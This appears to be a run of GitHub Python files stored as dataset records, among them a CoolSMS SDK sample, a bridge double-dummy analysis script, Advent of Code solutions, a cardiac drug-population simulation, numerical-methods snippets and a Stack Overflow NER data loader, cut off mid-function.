\"../../\")\n\nfrom sdk.api.group_message import GroupMessage\nfrom sdk.exceptions import CoolsmsException\n\n## @brief This sample code demonstrate how to check group info through CoolSMS Rest API\nif __name__ == \"__main__\":\n\n # set api key, api secret\n api_key = \"#ENTER_YOUR_OWN#\"\n api_secret = \"#ENTER_YOUR_OWN#\"\n\n # group_id mandatory. must be filled\n group_id = \"GID57A82D462CBBF\" # Group ID\n\n cool = GroupMessage(api_key, api_secret)\n\n try:\n response = cool.send(group_id)\n print(\"Group ID : %s\" % response['group_id'])\n\n except CoolsmsException as e:\n print(\"Error Code : %s\" % e.code)\n print(\"Error Message : %s\" % e.msg)\n\n sys.exit()\n","repo_name":"coolsms/python-sdk","sub_path":"examples/group_message/send.py","file_name":"send.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"68"} +{"seq_id":"26062932958","text":"import re, glob, os\nimport calendar\nfrom matplotlib import pyplot as plt\nfrom collections import Counter\nimport pandas as pd\n\nboard = r'[[]Board\\s+[\"](\\d+)[\"]'\ndeal = r'[[]Deal\\s+[\"][NESW]:(.*)[\"][]]'\ndoubleDummyTricks = r'[[]DoubleDummyTricks\\s+[\"](.*)[\"]'\npd.set_option('display.width', 1000)\n#pd.set_option('display.max_rows', 500)\n\ndef getData(FILENAME):\n try:\n with open(FILENAME, \"r\") as f:\n allLines = f.readlines()\n return allLines\n except IOError as e:\n print(e)\n\ndef extractData(data):\n results = []\n for d in data:\n result = re.search(f'{board}', d)\n if result:\n h = {}\n h['board'] = result.group(1)\n\n result = re.search(f'{deal}', d)\n if result: \n h['deal'] = result.group(1)\n \n result = re.search(f'{doubleDummyTricks}', d)\n if result: \n h['tricks'] = result.group(1)\n results.append(h)\n return results\n\ndef hasDoubleDummyAnalysis(fileName):\n data = getData(fileName)\n try:\n result = re.search(f'{doubleDummyTricks}', \", \".join(data))\n if result:\n if result.group(1) == \"00000000000000000000\": \n print(f\"*** error in file\", end=\", \")\n return False\n except Exception as e:\n print(e)\n return bool(result)\n\ndef computeTotalTricks(results):\n TNTricks = []\n for result in results:\n tricks = [int(c, 16) for c in result['tricks']]\n NS = [(n+s)/2 for n, s in zip(tricks[0:5], tricks[5:10])]\n EW = [(e+w)/2 for e, w in zip(tricks[10:15], tricks[15:20])]\n TNTricks.append(max(NS) + max(EW))\n return TNTricks\n\ndef computeTotalTrumps(results):\n TNTrumps = []\n for result in results:\n hands = result['deal'].split()\n distributions = []\n for hand in hands:\n distributions.append([len(suit) for suit in hand.split('.')])\n NS = [n+s for n, s in zip(distributions[0], distributions[2])]\n EW = [e+w for e, w in zip(distributions[1], distributions[3])]\n TNTrumps.append(max(NS) + max(EW))\n return TNTrumps\n\n \ndef checkFilesForDoubleDummyInformation(pattern):\n listOfFiles = glob.glob(pattern)\n listOfFiles.sort()\n for fileName in listOfFiles:\n if not hasDoubleDummyAnalysis(fileName):\n year = fileName[8:12]\n month_idx = int(fileName[12:14])\n month = calendar.month_name[month_idx]\n day = fileName[14:16]\n print(f\"No double dummy analysis: {day} {month} {year} \")\n\ndef examinePointsFor_4S(pattern):\n def HCPs(hand):\n pts = 0\n for suit in hand:\n if 'A' in suit: pts += 4\n if 'K' in suit: pts += 3\n if 'Q' in suit: pts += 2\n if 'J' in suit: pts += 1\n return pts\n def distribution(hand):\n suitLengths = []\n for suit in hand:\n suitLengths.append(len(suit))\n return suitLengths\n\n listOfFiles = glob.glob(pattern)\n listOfFiles.sort()\n columns = ['ns_pts','ns_tricks','ns_trumps','ew_pts','ew_tricks','ew_trumps']\n df = pd.DataFrame(columns=columns)\n def best(d):\n biggest = 0\n big_d = {}\n for key in d:\n if d[key] > biggest: \n biggest = d[key]\n big_d = {key:d[key]}\n return big_d\n \n for fileName in listOfFiles:\n data = getData(fileName)\n results = extractData(data)\n for result in results:\n tricks = [int(c, 16) for c in result['tricks']]\n hands = result['deal'].split()\n N = HCPs(hands[0].split(\".\"))\n E = HCPs(hands[1].split(\".\"))\n S = HCPs(hands[2].split(\".\"))\n W = HCPs(hands[3].split(\".\"))\n NS_pts = N + S\n EW_pts = E + W\n tricks = [int(c, 16) for c in result['tricks']] # nt-S-H-D-C\n NS_tricks = {key:(n+s)/2.0 for key,n,s in zip([\"NT\",\"S\",\"H\",\"D\",\"C\"], tricks[0:5], tricks[5:10])}\n EW_tricks = {key:(e+w)/2.0 for key,e,w in zip([\"NT\",\"S\",\"H\",\"D\",\"C\"], tricks[10:15], tricks[15:20])}\n N = distribution(hands[0].split(\".\"))\n E = distribution(hands[1].split(\".\"))\n S = distribution(hands[2].split(\".\"))\n W = distribution(hands[3].split(\".\"))\n NS_trumps = {key:n+s for key,n,s in zip([\"S\",\"H\",\"D\",\"C\"],N,S)}\n EW_trumps = {key:e+w for key,e,w in zip([\"S\",\"H\",\"D\",\"C\"],E,W)}\n best_ns_tricks = best(NS_tricks)\n best_ew_tricks = best(EW_tricks)\n ns_tricks = list(best_ns_tricks.values())[0]\n ew_tricks = list(best_ew_tricks.values())[0]\n ns_suit = list(best_ns_tricks.keys())[0]\n ew_suit = list(best_ew_tricks.keys())[0]\n# print(f\"NS: tricks={ns_tricks}, trumps={NS_trumps[ns_suit]}, HCPs={NS_pts}\")\n# print(f\"EW: tricks={ew_tricks}, trumps={EW_trumps[ew_suit]}, HCPs={EW_pts}\")\n # columns = ['ns_pts','ns_tricks','ew_trumps','ew_pts','ew_tricks','ew_trumps']\n ns_trumps = 0 if ns_suit == \"NT\" else NS_trumps[ns_suit]\n ew_trumps = 0 if ew_suit == \"NT\" else EW_trumps[ew_suit]\n row = {k:v for k,v in zip(columns, [NS_pts, ns_tricks, ns_trumps, EW_pts, ew_tricks, ew_trumps])}\n df = df.append(row, ignore_index=True)\n\n return df\n\ndef showLAW(pattern):\n listOfFiles = glob.glob(pattern)\n listOfFiles.sort()\n allDifferences = []\n \n for fileName in listOfFiles:\n data = getData(fileName)\n results = extractData(data)\n totalTricks = computeTotalTricks(results)\n totalTrumps = computeTotalTrumps(results) \n differences = [tricks-trumps for tricks, trumps in zip(totalTricks, totalTrumps)]\n\n for i, difference in enumerate(differences):\n # if difference <= -10 then the data has been uploaded incorrectly and should be ignored\n if (difference < -2.5 and difference > -10) or (difference > 2.5): \n year = fileName[8:12]\n month_idx = int(fileName[12:14])\n month = calendar.month_name[month_idx]\n day = fileName[14:16]\n tricks = totalTricks[i]\n trumps = totalTrumps[i]\n mismatch = tricks - trumps\n print(f\"Board {i+1:2} has LAW: {tricks:4.1f}-{trumps:2}={mismatch:4.1f}, {day} {month} {year}\") \n allDifferences.extend(differences)\n \n # remove data that has been posted incorrectly\n allDifferences = [d for d in allDifferences if d > -10]\n\n # determine frequencies\n allDifferences.sort()\n counts = Counter(allDifferences)\n numberOfHands = len(allDifferences)\n print(f\"No of hands = {numberOfHands}\")\n\n # print frequencies as percentages\n for key in counts:\n print(\"TNT mismatch: {:6.1f} {:6.1f}\".format(key, counts[key]*100/numberOfHands))\n\n # plot results\n _, ax = plt.subplots()\n ax.bar(range(len(allDifferences)), allDifferences)\n plt.grid(True)\n plt.show()\n\nif __name__ == \"__main__\":\n os.chdir(\"results\")\n pattern = r\"laneend*\"\n checkFilesForDoubleDummyInformation(pattern)\n z = examinePointsFor_4S(pattern)\n print(z)\n# showLAW(pattern)\n","repo_name":"seddon-software/bridge","sub_path":"DoubleDummyAnalysis/analysePbnResults2.py","file_name":"analysePbnResults2.py","file_ext":"py","file_size_in_byte":7261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"5314486827","text":"\ndef parse_strategy_guide(strategy_guide):\n return [\n tuple(line.split()) \n for line in strategy_guide.strip().split('\\n')\n ]\n\ndef get_total_player_score(strategy_guide):\n rounds = parse_strategy_guide(strategy_guide)\n scores = [\n RockPaperScissorsRound(_round[0], _round[1]).get_player_score()\n for _round in rounds \n ]\n\n return sum(scores)\n\nclass RockPaperScissorsRound:\n shape_scores = {\n 'A': 1,\n 'X': 0,\n 'B': 2,\n 'Y': 3,\n 'C': 3,\n 'Z': 6\n }\n\n rules = {\n 'A': 'C',\n 'B': 'A',\n 'C': 'B',\n }\n\n rule_complement = {\n 'C': 'A',\n 'A': 'B',\n 'B': 'C'\n }\n\n def __init__(self, opponent_choice, outcome):\n self.opponent_choice = opponent_choice\n self.outcome = outcome\n\n def get_player_score(self):\n score = 0\n player_choice = None\n\n if self.outcome == 'X':\n player_choice = self.rules[self.opponent_choice]\n if self.outcome == 'Y':\n player_choice = self.opponent_choice\n if self.outcome == 'Z':\n player_choice = self.rule_complement[self.opponent_choice]\n\n return self.shape_scores[player_choice] + self.shape_scores[self.outcome]\n\n def get_opponent_score(self):\n score = 0\n\n if self.rules[self.opponent_choice] == self.player_choice:\n score += 6\n elif self.rules[self.player_choice] == self.opponent_choice:\n pass\n else:\n score += 3\n\n score += self.shape_scores[self.opponent_choice]\n return score \n\nif __name__ == \"__main__\":\n f = open(\"test_input\", \"r\")\n strategy_guide = f.read()\n f.close\n print(get_total_player_score(strategy_guide))\n","repo_name":"braedon2/AdventOfCode2022","sub_path":"day2/day2.py","file_name":"day2.py","file_ext":"py","file_size_in_byte":1769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"32054891754","text":"import numpy as np\nimport io\nimport argparse\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--test\", action=\"store_true\")\n parser.add_argument(\"--verbose\", action=\"store_true\")\n\n args, _ = parser.parse_known_args()\n test = args.test\n verbose = args.verbose\n\n if test:\n infile = \"test_input\"\n else:\n infile = \"input\"\n \n with open(infile, \"r\") as f:\n lines = f.readlines()\n \n signals = []\n outputs = []\n len_to_digit = {\n 2: 1,\n 3: 7,\n 4: 4,\n 7: 8,\n }\n num_unique = 0\n for line in lines:\n signal = [s.strip() for s in line.split(\"|\")[0].split(\" \") if s != \"\"]\n output = [s.strip() for s in line.split(\"|\")[1].split(\" \") if s != \"\"]\n signals.append(signal)\n outputs.append(output)\n\n # for s in signal:\n # if len(s) in len_to_digit.keys():\n # num_unique += 1\n # print(s, end=\" \")\n for o in output:\n if len(o) in len_to_digit.keys():\n num_unique += 1\n if verbose:\n print(o, end=\" \")\n if verbose:\n print(\"\")\n \n print(num_unique)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"stevenstetzler/advent-of-code-2021","sub_path":"day_8/solution_15.py","file_name":"solution_15.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"10595626573","text":"import ORdmm_Land_em_coupling as model\nfrom scipy.integrate import odeint\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport tqdm\nimport sys\n\nfrom drug_values import drug_dict\n\nnum_beats = 100\ntsteps = np.arange(0.0, 1000.0, 0.1) # real run 1000\npop_size = 1000\n\ndef run_population_drug(mech_type, hf_type, drug_type, part, cell_type='endo'):\n \"\"\"Run the population model with different drugs.\n \"\"\"\n # load random sampling values\n rand_val = np.load(f'init_pop/rand_sample_iso_control.npy')\n # load specific population\n y0s = np.load(f'init_pop/population_{mech_type}_{hf_type}.npy') \n # list for new population\n population_drug = []\n\n part_dict = {'1': [0,200], '2': [200,400], '3': [400,600], '4': [600,800], '5': [800,1000]}\n\n for i in range(part_dict[part][0], part_dict[part][1]):\n print(i)\n y0 = y0s[i]\n\n parameters = model.init_parameter_values(\n celltype=0 if cell_type == \"endo\" else 1 if cell_type == \"epi\" else 2,\n isometric=1 if mech_type=='iso' else 0,\n lmbda_set=1,\n #mechanical parameters\n ku_rate=rand_val[i][0],\n kuw_rate=rand_val[i][1],\n kws_rate=rand_val[i][2],\n ktrpn_rate=rand_val[i][3],\n Trpn50_rate=rand_val[i][4],\n gammaw_rate=rand_val[i][5],\n gammas_rate=rand_val[i][6],\n rs_rate=rand_val[i][7],\n rw_rate=rand_val[i][8],\n Tref_rate=rand_val[i][9],\n cat50ref_rate=rand_val[i][10],\n ntm_rate=rand_val[i][11],\n #HF parameters\n GNaL_rate=1.80 if hf_type=='gomez' else 1,\n Gto_rate=0.40 if hf_type=='gomez' else 1,\n GK1_rate=0.68 if hf_type=='gomez' else 1,\n Gncx_rate=1.750 if hf_type=='gomez' else 1,\n Jleak_rate=1.30 if hf_type=='gomez' else 1,\n Jserca_rate=0.5 if hf_type=='gomez' else 1,\n CaMKa_rate=1.50 if hf_type=='gomez' else 1,\n Pnak_rate=0.70 if hf_type=='gomez' else 1,\n Pnab_rate=1,\n Pcab_rate=1,\n thl_rate=1.80 if hf_type=='gomez' else 1,\n Jrel_inf_sensitivity=0.80 if hf_type=='gomez' else 1,\n Jrel_infp_sensitivity=0.80 if hf_type=='gomez' else 1,\n # drug parameters\n drug_INa=drug_dict[drug_type]['drug_INa'],\n IC50_INa=drug_dict[drug_type]['IC50_INa'],\n h_INa=drug_dict[drug_type]['h_INa'],\n drug_IKr=drug_dict[drug_type]['drug_IKr'],\n IC50_IKr=drug_dict[drug_type]['IC50_IKr'],\n h_IKr=drug_dict[drug_type]['h_IKr'],\n drug_ICaL=drug_dict[drug_type]['drug_ICaL'],\n IC50_ICaL=drug_dict[drug_type]['IC50_ICaL'],\n h_ICaL=drug_dict[drug_type]['h_ICaL'],\n drug_INaL=drug_dict[drug_type]['drug_INaL'],\n IC50_INaL=drug_dict[drug_type]['IC50_INaL'],\n h_INaL=drug_dict[drug_type]['h_INaL'],\n drug_IKs=drug_dict[drug_type]['drug_IKs'],\n IC50_IKs=drug_dict[drug_type]['IC50_IKs'],\n h_IKs=drug_dict[drug_type]['h_IKs'],\n drug_Ito=drug_dict[drug_type]['drug_Ito'],\n IC50_Ito=drug_dict[drug_type]['IC50_Ito'],\n h_Ito=drug_dict[drug_type]['h_Ito'],\n drug_IK1=drug_dict[drug_type]['drug_IK1'],\n IC50_IK1=drug_dict[drug_type]['IC50_IK1'],\n h_IK1=drug_dict[drug_type]['h_IK1'],\n )\n\n for n in tqdm.tqdm(range(num_beats)):\n y = odeint(model.rhs, y0, tsteps, args=(parameters,))\n y0 = y[-1]\n \n population_drug.append(y0)\n \n np.save(f'init_pop_drug/population_{mech_type}_{hf_type}_{drug_type}_{part}.npy', population_drug, allow_pickle=True) \n\n\n\n\nif __name__ == \"__main__\":\n\n mech = sys.argv[1]\n hf = sys.argv[2]\n drug = sys.argv[3]\n partition = sys.argv[4]\n\n run_population_drug(mech_type=mech, hf_type=hf, drug_type=drug, part=partition)\n\n\n\n\n \n\n\n","repo_name":"abraaum/master_project","sub_path":"Python/population_drug.py","file_name":"population_drug.py","file_ext":"py","file_size_in_byte":3969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"32108855838","text":"class Stack:\n def __init__(self):\n self.stack = []\n\n def add(self, dataval):\n self.stack.append(dataval)\n # Use list append method to add element\n # if dataval not in self.stack:\n # self.stack.append(dataval)\n # return True\n # else:\n # return False\n # Use peek to look at the top of the stack\n\n def peek(self):\n return self.stack[-1]\n\n # look element all\n def __str__(self):\n return \"ข้อมูล : {} จำนวนข้อมูล : {}\".format(self.stack, len(self.stack))\n\n # remove element top\n def remove(self):\n if len(self.stack) <= 0:\n return (\"No element in the Stack\")\n else:\n return self.stack.pop()\n\n def lengghtStack(self):\n return len(self.stack)\nif __name__ == '__main__':\n \n stack = Stack()\n String = \"a-(b+c*d)/e\"\n postfix = \"\"\n # if 'a' in \"+-/%)*(\":\n # print(\"True\")\n # else:\n # print(\"False\")\n for ch in String:\n if ch not in \"+-/%)*(\":\n postfix += ch\n elif ch == '(':\n stack.add(ch)\n elif ch == ')':\n while stack.peek() != '(':\n postfix += stack.peek()\n stack.remove()\n stack.remove()\n else:\n stack.add(ch)\n while(stack.lengghtStack() != 0):\n postfix += stack.peek()\n stack.remove()\n print(postfix)\n\n","repo_name":"sekkarin/python-datastuctue-and-algorittm","sub_path":"Stack/Stack.py","file_name":"Stack.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"29665241076","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Feb 24 00:15:32 2023\n\n@author: ken3\n\nIntrodution\n \n\"\"\"\n\nimport numpy as np\n\ndef convolve(x, h):\n \"\"\"\n Computes the convolution of two sequences x and h.\n \"\"\"\n N = len(x)\n M = len(h)\n y = np.zeros(N+M-1)\n for n in range(N+M-1):\n for k in range(max(0, n-M+1), min(N, n+1)):\n y[n] += x[k] * h[n-k]\n return y\n\nx = np.array([1, 2, 3])\nh = np.array([1, 1, 1])\ny = convolve(x, h)\nprint(y)","repo_name":"sou350121/probability-Statistics-Introduction-and-Visualization","sub_path":"convolution.py","file_name":"convolution.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"20394694079","text":"# Fourier stability analysis of RKDG scheme\nimport numpy as np\nfrom numpy.linalg import eigvals\nimport argparse\nfrom basis import *\n\n# Get arguments\nparser = argparse.ArgumentParser()\nparser.add_argument('-degree', type=int, help='Degree', required=True)\nparser.add_argument('-cfl_min', type=float, help='Min cfl', default=0.0)\nparser.add_argument('-cfl_max', type=float, help='Max cfl', default=1.0)\nparser.add_argument('-scheme',\n choices=('fe','ssprk22','ssprk33','ssprk43','ssprk54','rk4'),\n help='Time scheme', required=True)\nargs = parser.parse_args()\n\nk = args.degree # degree\nNq = k + 1 # number of quadrature points\nnd = k + 1 # number of dofs\n\n# QGauss position and weights\nxg, wg = np.polynomial.legendre.leggauss(Nq)\n\n# Construct Vandermonde matrix for gauss points\nVf = np.zeros((Nq,nd))\nVg = np.zeros((Nq,nd))\nfor i in range(Nq):\n for j in range(nd):\n Vf[i,j] = shape_value(j, xg[i])\n Vg[i,j] = shape_grad (j, xg[i])\n\n# Identity\nI = np.eye(nd)\n\ndef amplification_matrix(scheme, nu, C):\n if scheme == 'fe':\n H = I + nu*C\n elif scheme == 'ssprk22':\n G = I + nu*C\n H = 0.5*(I + G@G)\n elif scheme == 'ssprk33':\n G = I + nu*C\n H = (1.0/3.0)*I + (1.0/2.0)*G + (1.0/6.0)*(G@G@G)\n elif scheme == 'ssprk43':\n G = I + 0.5*nu*C\n H = (2.0/3.0)*G + (1.0/3.0)*G@G@G@G\n elif scheme == 'ssprk54':\n c11 = 0.391752226571890\n\n c21 = 0.444370493651235\n c22 = 1.0 - c21\n c23 = 0.368410593050371\n\n c31 = 0.620101851488403\n c32 = 1.0 - c31\n c33 = 0.251891774271694\n\n c41 = 0.178079954393132\n c42 = 1.0 - c41\n c43 = 0.544974750228521\n\n c51 = 0.517231671970585\n c52 = 0.096059710526147\n c53 = 1.0 - (c51 + c52)\n c54 = 0.063692468666290\n c55 = 0.226007483236906\n\n G1 = I + c11*nu*C\n G2 = c21*I + (c22*I + c23*nu*C) @ G1\n G3 = c31*I + (c32*I + c33*nu*C) @ G2\n G4 = c41*I + (c42*I + c43*nu*C) @ G3\n G5 = c52*I + c54*nu*C\n G6 = c53*I + c55*nu*C\n\n H = c51*G2 + G5@G3 + G6@G4\n elif scheme == 'rk4':\n G1 = nu*C\n G2 = G1 + 0.5*G1@G1\n G3 = G1 + 0.5*G1@G2\n G4 = G1 + G1@G3\n H = I + (1.0/6.0)*(G1+G4) + (1.0/3.0)*(G2+G3)\n else:\n print('Unknown time scheme')\n exit()\n return H\n\nM = np.zeros((nd,nd))\nA = np.zeros((nd,nd))\nBm= np.zeros((nd,nd))\nBp= np.zeros((nd,nd))\nfor i in range(nd):\n for j in range(nd):\n Bm[i,j] = shape_value(i,-1.0) * shape_value(j,+1.0)\n Bp[i,j] = shape_value(i,+1.0) * shape_value(j,+1.0)\n for q in range(Nq):\n M[i,j] += 0.5*Vf[q,i]*Vf[q,j]*wg[q]\n A[i,j] += Vg[q,i]*Vf[q,j]*wg[q]\n\nprint(\"M=\",M)\nprint(\"A=\",A)\n\nwavenums = np.linspace(0,2*np.pi,500)\ncfls = np.linspace(args.cfl_min,args.cfl_max,100)\nfor nu in cfls:\n maxeig = 0.0\n for kdx in wavenums:\n C = A + np.exp(-1j*kdx)*Bm - Bp\n H = amplification_matrix(args.scheme, nu, C)\n eig = np.abs(eigvals(H)).max()\n if eig > maxeig:\n maxeig = eig\n print(nu,maxeig)\n if maxeig - 1.0 > 1.0e-12:\n break\n","repo_name":"cpraveen/fem","sub_path":"dg1d/scalar/fourier.py","file_name":"fourier.py","file_ext":"py","file_size_in_byte":3208,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"68"} +{"seq_id":"2667260520","text":"from __future__ import print_function, division\nimport os\nimport re\nimport codecs\nimport unicodedata\n\nimport model\nimport string\nimport random\nimport numpy as np\n\nimport utils_so as utils #JT: utils for SO\n\nfrom config_so import parameters\nnp.random.seed(parameters[\"seed\"])\n\n\nfrom utils_so import create_dico, create_mapping, zero_digits, Merge_Label\nfrom utils_so import iob2, iob_iobes\n\n\n\n\ndef unicodeToAscii(s):\n return ''.join(\n c for c in unicodedata.normalize('NFD', s)\n if unicodedata.category(c) != 'Mn'\n and c in string.ascii_letters + \" .,;'-\"\n )\n\n\ndef load_sentences_so(path, lower, zeros, merge_tag,set_of_selected_tags):\n \"\"\"\n Load sentences. A line must contain at least a word and its tag.\n Sentences are separated by empty lines.\n \"\"\"\n count_question=0\n count_answer=0\n\n if merge_tag:\n path=Merge_Label(path)\n sentences = [] #list of sentences\n\n sentence = [] #list of words in the current sentence in formate each word list looks like [word, markdow tag name, mark down tag, NER tag]\n max_len = 0\n for line in open(path):\n if line.startswith(\"Question_ID\"):\n count_question+=1\n\n if line.startswith(\"Answer_to_Question_ID\"):\n count_answer+=1\n\n if line.strip()==\"\":\n if len(sentence) > 0:\n #print(sentence)\n output_line = \" \".join(w[0] for w in sentence)\n #print(output_line)\n if \"code omitted for annotation\" in output_line and \"CODE_BLOCK :\" in output_line:\n sentence = []\n continue\n elif \"omitted for annotation\" in output_line and \"OP_BLOCK :\" in output_line:\n sentence = []\n continue\n elif \"Question_URL :\" in output_line:\n sentence = []\n continue\n elif \"Question_ID :\" in output_line:\n sentence = []\n continue\n else:\n #print(output_line)\n sentences.append(sentence)\n if len(sentence)>max_len:\n max_len=len(sentence)\n sentence=[]\n \n \n\n else:\n line_values=line.strip().split()\n\n gold_word=line_values[0]\n gold_label=line_values[1]\n raw_word=line_values[2]\n raw_label=line_values[3]\n\n \n\n gold_word=\" \".join(gold_word.split('-----'))\n \n\n\n gold_label_name= gold_label.replace(\"B-\",\"\").replace(\"I-\",\"\")\n if gold_label_name not in set_of_selected_tags:\n gold_label=\"O\"\n\n if parameters['segmentation_only']:\n if gold_label!=\"O\":\n # print(gold_label)\n gold_label_prefix=gold_label.split(\"-\")[0]\n gold_label=gold_label_prefix+\"-\"+\"Name\"\n # print(gold_label)\n # print(\"updated gold label\")\n\n \n\n \n raw_label_name=raw_label.replace(\"B-\",\"\").replace(\"I-\",\"\")\n \n word_info=[gold_word, raw_label_name, raw_label, gold_label]\n \n sentence.append(word_info)\n\n print(\"------------------------------------------------------------\")\n print(\"Number of questions in \", path, \" : \", count_question)\n print(\"Number of answers in \", path, \" : \", count_answer)\n print(\"Number of sentences in \", path, \" : \", len(sentences))\n print(\"Max len sentences has\", max_len, \"words\")\n print(\"------------------------------------------------------------\")\n return sentences\n \ndef load_sentences_so_w_pred(path_main_file, path_segmenter_pred_file, lower, zeros, merge_tag,set_of_selected_tags):\n \"\"\"\n Load sentences. A line must contain at least a word and its tag.\n Sentences are separated by empty lines.\n \"\"\"\n count_question=0\n count_answer=0\n max_len = 0\n\n if merge_tag:\n path=Merge_Label(path_main_file)\n sentences = [] #list of sentences\n\n sentence = [] #list of words in the current sentence in formate each word list looks like [word, markdow tag name, mark down tag, NER tag]\n\n for line in open(path):\n if line.startswith(\"Question_ID\"):\n count_question+=1\n\n if line.startswith(\"Answer_to_Question_ID\"):\n count_answer+=1\n\n if line.strip()==\"\":\n if len(sentence) > 0:\n #print(sentence)\n output_line = \" \".join(w[0] for w in sentence)\n #print(output_line)\n if \"code omitted for annotation\" in output_line and \"CODE_BLOCK :\" in output_line:\n sentence = []\n continue\n elif \"omitted for annotation\" in output_line and \"OP_BLOCK :\" in output_line:\n sentence = []\n continue\n elif \"Question_URL :\" in output_line:\n sentence = []\n continue\n elif \"Question_ID :\" in output_line:\n sentence = []\n continue\n else:\n #print(output_line)\n sentences.append(sentence)\n if len(sentence)>max_len:\n max_len=len(sentence)\n sentence=[]\n \n \n\n else:\n line_values=line.strip().split()\n\n gold_word=line_values[0]\n gold_label=line_values[1]\n raw_word=line_values[2]\n raw_label=line_values[3]\n\n \n\n gold_word=\" \".join(gold_word.split('-----'))\n \n\n\n gold_label_name= gold_label.replace(\"B-\",\"\").replace(\"I-\",\"\")\n if gold_label_name not in set_of_selected_tags:\n gold_label=\"O\"\n\n if parameters['segmentation_only']:\n if gold_label!=\"O\":\n # print(gold_label)\n gold_label_prefix=gold_label.split(\"-\")[0]\n gold_label=gold_label_prefix+\"-\"+\"Name\"\n # print(gold_label)\n # print(\"updated gold label\")\n\n \n\n \n raw_label_name=raw_label.replace(\"B-\",\"\").replace(\"I-\",\"\")\n \n word_info=[gold_word, raw_label_name, raw_label, gold_label]\n \n sentence.append(word_info)\n\n \n\n\n sentences_preds = []\n sentence_pred = []\n \n for line in open(path_segmenter_pred_file):\n if line.strip()==\"\":\n if len(sentence_pred) > 0:\n sentences_preds.append(sentence_pred)\n sentence_pred=[]\n else:\n line_values=line.strip().split()\n pred_word= ' '.join(line_values[:-2])\n pred_label=line_values[-1]\n\n word_info=[pred_word, pred_label]\n sentence_pred.append(word_info)\n\n # print(len(sentences_preds),len(sentences))\n\n \n\n\n\n pred_merged_sentences = []\n for sent_index in range(len(sentences)):\n main_sent = sentences[sent_index]\n pred_sent = sentences_preds[sent_index]\n \n\n new_sent = []\n new_word_info =[]\n\n for word_index in range(len(main_sent)):\n [gold_word, raw_label_name, raw_label, gold_label] = main_sent[word_index]\n [pred_word, pred_seg_label] = pred_sent[word_index]\n \n\n new_word_info = [gold_word, raw_label_name, raw_label, pred_seg_label, gold_label]\n new_sent.append(new_word_info)\n\n if len(new_sent)>0:\n pred_merged_sentences.append(new_sent)\n\n\n\n\n\n print(\"------------------------------------------------------------\")\n print(\"Number of questions in \", path, \" : \", count_question)\n print(\"Number of answers in \", path, \" : \", count_answer)\n print(\"Number of sentences in \", path, \" : \", len(sentences))\n print(\"Number of sentences after merging : \" , len(pred_merged_sentences))\n print(\"Max len sentences has\", max_len, \"words\")\n print(\"------------------------------------------------------------\")\n return pred_merged_sentences\n \n\n\ndef load_sentences_conll(path, lower, zeros):\n \"\"\"\n Load sentences. A line must contain at least a word and its tag.\n Sentences are separated by empty lines.\n \"\"\"\n sentences = []\n sentence = []\n for line in codecs.open(path, 'r', 'utf-8'):\n line = zero_digits(line.rstrip()) if zeros else line.rstrip()\n if not line:\n if len(sentence) > 0:\n if 'DOCSTART' not in sentence[0][0]:\n sentences.append(sentence)\n sentence = []\n else:\n word = line.split()\n assert len(word) >= 2\n sentence.append(word)\n if len(sentence) > 0:\n if 'DOCSTART' not in sentence[0][0]:\n sentences.append(sentence)\n return sentences\n\n\ndef update_tag_scheme(sentences, tag_scheme):\n \"\"\"\n Check and update sentences tagging scheme to IOB2.\n Only IOB1 and IOB2 schemes are accepted.\n \"\"\"\n\n for i, s in enumerate(sentences):\n tags = [w[-1] for w in s]\n #print(\"prev tags: \",tags)\n # Check that tags are given in the IOB format\n if not iob2(tags):\n s_str = '\\n'.join(' '.join(w) for w in s)\n raise Exception('Sentences should be given in IOB format! ' +\n 'Please check sentence %i:\\n%s' % (i, s_str))\n if tag_scheme == 'iob':\n # If format was IOB1, we convert to IOB2\n for word, new_tag in zip(s, tags):\n word[-1] = new_tag\n elif tag_scheme == 'iobes':\n new_tags = iob_iobes(tags)\n for word, new_tag in zip(s, new_tags):\n word[-1] = new_tag\n\n else:\n raise Exception('Unknown tagging scheme!')\n # tags = [w[-1] for w in s]\n # print(\"new tags: \",tags)\n\n\n\ndef word_mapping(sentences, lower):\n \"\"\"\n Create a dictionary and a mapping of words, sorted by frequency.\n \"\"\"\n words = [[x[0].lower() if lower else x[0] for x in s] for s in sentences]\n dico = create_dico(words) #dict with word frequency\n # print(dico)\n\n dico[''] = 10000001\n dico[''] = 10000000\n dico = {k:v for k,v in dico.items() if v>=3} #prune words which has occureced less than 3 times\n word_to_id, id_to_word = create_mapping(dico)\n\n print(\"Found %i unique words (%i in total)\" % (\n len(dico), sum(len(x) for x in words)\n ))\n\n return dico, word_to_id, id_to_word\n\n\ndef char_mapping(sentences):\n \"\"\"\n Create a dictionary and mapping of characters, sorted by frequency.\n \"\"\"\n chars = [\"\".join([w[0] for w in s]) for s in sentences]\n dico = create_dico(chars)\n dico[''] = 10000000\n # dico[';'] = 0\n char_to_id, id_to_char = create_mapping(dico)\n print(\"Found %i unique characters\" % len(dico))\n return dico, char_to_id, id_to_char\n\n\ndef tag_mapping(sentences):\n \"\"\"\n Create a dictionary and a mapping of tags, sorted by frequency.\n \"\"\"\n tags = [[word[-1] for word in s] for s in sentences]\n dico = create_dico(tags)\n dico[model.START_TAG] = -1\n dico[model.STOP_TAG] = -2\n tag_to_id, id_to_tag = create_mapping(dico)\n print(\"Found %i unique named entity tags\" % len(dico))\n # print(dico)\n return dico, tag_to_id, id_to_tag\n\ndef cap_feature(s):\n \"\"\"\n Capitalization feature:\n 0 = low caps\n 1 